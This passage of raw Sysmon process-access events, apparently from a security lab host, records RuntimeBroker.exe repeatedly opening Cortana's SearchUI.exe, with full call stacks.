4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405552C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405552C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405460C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 